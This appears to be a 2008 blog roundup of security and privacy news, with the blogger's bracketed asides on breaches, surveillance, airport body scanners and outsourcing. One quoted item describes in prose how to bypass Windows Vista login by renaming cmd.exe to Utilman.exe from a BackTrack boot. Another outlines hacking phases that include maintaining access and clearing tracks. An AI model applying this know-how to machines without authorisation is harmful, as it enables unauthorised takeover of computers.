"According to European researchers, modern buses could be used as mobile sensing platforms, sending out live information to be used to control traffic and detect road hazards. The 3.83 million euro EU-funded MORYNE project was completed in March 2008 with a test in Berlin, Germany. During this test, the researchers 'equipped city buses with environmental sensors and cameras, allowing the vehicles to become transmitters of measurements, warnings and live or recorded videos to anyone allowed to access the data.' "

This is wrong on so many levels... Does no one proof read any more? Nice idea at the end...

Fruity link too juicy for kids

5:00AM Sunday May 25, 2008 By Alice Hudson

A healthy food website promoted to children on hundreds of bags of pre-packed mandarins has turned out to be a link to hardcore pornography.

... She replaced .com with and found what Levi was looking for - "a brilliant interactive site for children".

Finer said she phoned FreshMax thinking the .com address was a misprint. She said she was told the unregistered .com site had been hacked into. The company phoned back apologising for the glitch and promising to fix the problem.

... A free download available at offers young computer users an icon called Hector's Button. Used in many primary schools, it teaches children to click on a swimming dolphin on the computer screen if they come across anything that upsets them.

Chisholm said the screen would immediately be replaced with an underwater scene featuring Hector and a message telling the child to get an adult.

Hate Outlook? - AtMail Goes OpenSource

AtMail, originally created in 1998, was of the first web-based mail solutions that was created as an alternative to Microsoft’s Outlook. Since then, it’s undergone four incarnations with latest taking on a Web 2.0 face with a simple and intuitive interface. And now, there’s an open source version available for users who want the same easy to use, feature rich webmail but for free. AtMail is written in PHP, has a lightweight Ajax interface which makes it faster, and includes videomail and IMAP support. If you’re familiar with Outlook or the commercial version of AtMail, this will have the same look and feel and it doesn’t cost a thing to use. Just download and get busy.

The last three installments of the “Assessment Methodology”

This one has potential

Search Engine for Instructional Information Launched

26th May 2008, 05:49 pm

New engine ( gave me some odd results, but I like the way it offers additional topic keywords.

For history and genealogy nuts, or you could make a movie for PBS

May 22, 2008

American Civil War Online

The Alexander Street Press has opened up access to their online Civil War collection: The American Civil War Online. From now through June 30th the resource is free to use online. This is an extensive and thoroughly engaging resource. Enjoy it while you can!

Monday, May 26, 2008

Note: This was announced on May 6th, but one line in this article caught my eye.

Stolen laptop contained students' personal information

By DANA C. SILANO Observer-Dispatch Posted May 24, 2008 @ 07:12 PM

HERKIMER — Students and applicants at Herkimer County Community College should watch their credit reports carefully, especially if they received a letter from the school notifying them of a stolen laptop from a SunGard employee.

... Kvinge said the computer belonged to a consulting employee of SunGard, and the incident occurred at a customer site. She would not disclose the name of the police agency that initially handled the case for security purposes. [Huh? Bob] For the same reason, she would not release the make or model of the computer.

“Naturally, we want to go public and let people know what's going on, but at the same time, when we go public, we're sending a message to the person who stole that laptop that there is personal information on there.”


Data “Dysprotection:” breaches reported last week

Monday, May 26 2008 @ 07:26 AM EDT Contributed by: PrivacyNews News Section: Breaches

A recap of incidents or privacy breaches reported last week for those who enjoy shaking their head and muttering to themselves with their morning coffee.

Source - Chronicles of Dissent

Interesting but futile? Another area not well covered by the ethical guidelines?

Law Firm Files Suit to Bar Outsourcing of Client Data

24th May 2008 posted in Outsourcing News and Top Outsourcing deals |


Law firms looking to cut costs by outsourcing their legal support services overseas could be jeopardizing their client confidentiality, according to a recent federal suit filed by a Bethesda, Md. firm.

Joseph Hennessey, name partner at Newman McIntosh & Hennessey, turned to the U.S. District Court for the District of Columbia on May 7 seeking a ruling on the outsourcing of privileged client data that may be subject to eavesdropping by the U.S. government.

... The firm is looking to the court to rule on whether outsourcing of legal services compromises constitutional rights and whether consent should be required before such data is sent abroad. It also wants the court to order law firms to disclose their use of foreign legal support and to order that the government establish protocols to shield attorney-client information from surveillance.

Summarizes the EU position, but I don't think it opens any new cans of worms.

Strong data protection rules are needed to prevent emergence of surveillance society

Monday, May 26 2008 @ 07:24 AM EDT Contributed by: PrivacyNews News Section: Non-U.S. News

Surveillance technology is developing with breath-taking speed. This creates new instruments in the struggle against terrorism and organised crime, but also raises fundamental questions on the right to privacy for everyone. Individuals should be protected from intrusions into their private life and from the improper collecting, storing, sharing and use of data about them. Terrorism and organised crime must be combated - but not with means which undermine basic human rights.

Source - New Europe: Thomas Hammarberg, Commissioner for Human Rights for the Council of Europe

Tools & Techniques Still think system passwords protect your computer? (Note: This is amusing but not particularly useful. There are much simpler ways to gain access.)

Gaining System-Level Access To Vista

Posted by kdawson on Monday May 26, @12:51AM from the seems-too-simple-somehow dept. Security Windows

An anonymous reader writes

"This video shows a method by which a user can use a Linux distro called BackTrack to gain system access to Windows Vista without logging into Windows or knowing the username or password for any accounts. To accomplish this, the user renames cmd.exe to Utilman.exe — this is the program that brings up the Accessibility options for users without sight or with limited vision. The attack takes advantage of the fact that the Utility Manager can be invoked before the user logs into the system. The user gains System access, which is a level higher than Administrator. The person who discovered this security hole claims that XP, 2000, 2003 and NT are not vulnerable to it; only Windows Vista is."

Since I don't have one, you must. Lots of good statistics to quote.,22049,23755088-5001028,00.html

Half of world's population has a mobile

Article from: Agence France-Presse From correspondents in Geneva May 25, 2008 04:58pm

THE number of mobile phone users world soared to over 3.3 billion by the end of 2007, equivalent to a penetration rate of 49 percent, the International Telecommunications Union has said in a report.

Africa showed the strongest gains over the past two years and more than two thirds of all mobile subscribers were from developing countries by the end of 2007, the ITU said.

Part 2 lists more tools and furthers the hack.

Assessment Methodology (Part 2)

Posted by hitechpo on May 25, 2008 at 2:30pm

Sunday, May 25, 2008

This is looking more and more like there is something fishy here.

Blumenthal Seeks Tri-State Probe Of Bank Breach (BNY Mellon update)

Saturday, May 24 2008 @ 11:12 AM EDT Contributed by: PrivacyNews News Section: Breaches

The state has broadened its investigation into the loss of a computer backup tape that reportedly contained personal and financial information about an undetermined number of Connecticut bank depositors, including 556,000 customers of People's United Bank.

Attorney General Richard Blumenthal said Friday that he has contacted attorneys general in New York and New Jersey, asking them to initiate a tri-state investigation into the security breach.

Source -

[From the article:

The tape reportedly contains information, including names, addresses, dates of birth and Social Security numbers, for 4.5 million people nationwide, Blumenthal said.

The Bank of New York Mellon has not confirmed that any financial institution other than People's was involved, state officials said.

... Blumenthal said his office relied on "sources that were regarded as credible" who said Webster was involved. He said Mellon has yet to say in writing which banks' information was lost.

The Bank of New York Mellon reiterated Friday that because of the banking industry's confidentiality practices, [which trump the Disclosure Laws? Bob] it could not publicly divulge information about its client relationships.

You have to work hard to integrate exam answers into a copyright notice and then ensure that no one proofreads it before printing 12,000 copies. No doubt these are the same folks who promise to protect your personal information.;_ylt=ApehbHnWvE3YxUuYMLDPwMWs0NUE

Every pupil's dream: the exam with answers on back

Thu May 22, 6:13 AM ET

... The OCR (Oxford, Cambridge and RSA) examination board admitted on Thursday that, because of a "printing error", papers sent to schools had answers to questions on the back page.

... "It is unlikely that any of the 12,000 students sitting the examination would have recognised the value of the information ... and subsequently used it," said the spokeswoman, adding there had been just 20 queries from teachers.

Might make an interesting hacking target...

May 24, 2008 4:17 pm US/Mountain

DIA Tests "Whole-Body Imaging"

DENVER (AP) ― Denver International Airport and five other airports are testing new technology to help security screeners detect guns and other prohibited items concealed under clothing.

The Transportation Security Administration was starting testing of its "whole body imaging" machines at DIA on Friday.

The technology makes use of beams of radio frequency energy that are projected over the body's surface. Energy reflected back from the body is used to construct a three-dimensional image.

The images are anatomically explicit, but passengers' faces are blurred, [Does this suggest we have better information on terrorist genitalia than terrorist faces? Bob] and security officials viewing the images are located in remote areas.

Florida-based airline consultant Stuart Klaskin shrugged off privacy concerns.

"There's a much-improved and expedited security-screening process using these machines," Klaskin said. "There probably is some momentary loss of privacy, but I don't think anyone has the time to look at these images in a prurient fashion. [There must be a way to record these images, how else would you demonstrate 'probable cause?' (Would you need to “ub-blur” the image for the same reason?) Bob] Realistically, it's much ado over nothing."

Travelers will be randomly selected for the new screening technique. [Prove it! Bob]

The El Paso County Judicial Complex has been using similar whole-body screening. [Perhaps they can convince Google to add it to their Google Maps project. They can take photos of streets and images of people! Bob]

Well-intended consequences?

Patriot Act Dampening Cloud Computing?

Posted by kdawson on Saturday May 24, @01:38PM from the hey-you-get-offa-my-cloud dept. Government The Internet

Julie188 writes

"Governments are turning the Internet into a cyberspace reflection of real-world geographic conflicts. One report says that the Canadian government is forbidding its IT organizations to use services that store or host the government's data outside their sovereign territory. They especially cannot use services where the data is stored in the United States because of fears over the Patriot Act. What kinds of jurisdiction issues might people face — think Google cooperating with the Chinese government — as cloud computing becomes the norm and your data is stored in 'offshore parts' of the cloud?"

It looks like the White Hat Club is a go. Part of the strategy will be to gather and organize a hacking toolkit, so articles like this will be collected; software mentioned will be downloaded and analyzed, and the techniques shared...

Assessment Methodology (Part 1)

Posted by hitechpo on May 24, 2008 at 5:30pm

I've been down for a couple of days, but now I'm back. I wanted to include a series of instructions on assessing. (I will use the term assessing as opposed to 'hacking' due to the derogatory connation that this term invokes.)

As a note, you should only be assessing those systems or networks that you have permission to assess. I will not be held responsible for any damages caused by someone using this information.

This information and more will be in my new book: "Information Security for Executives: The Practical Executive Guide to Information Security" (pending publication by the end of 2008). I thought I would give you a little glimpse of this guide now.

So here we go. These are the five (5) phases of the methodology behind conducting a vulnerability assessment:

1. Reconnaissance

2. Scanning

3. Gaining Access

4. Maintaining Access

5. Clearing Tracks

For my math class (all others keep out!)

I Will Derive

Posted by CmdrTaco on Saturday May 24, @12:33PM from the well-now-isn't-that-nice dept.

Jamie stumbled upon a very choice video this morning called I Will Derive. To the tune of some song you've never heard before, singing about subjects you know nothing about... oh and a a TI-84 cameo. It features the dopiest dancing you'll see on YouTube today. I promise.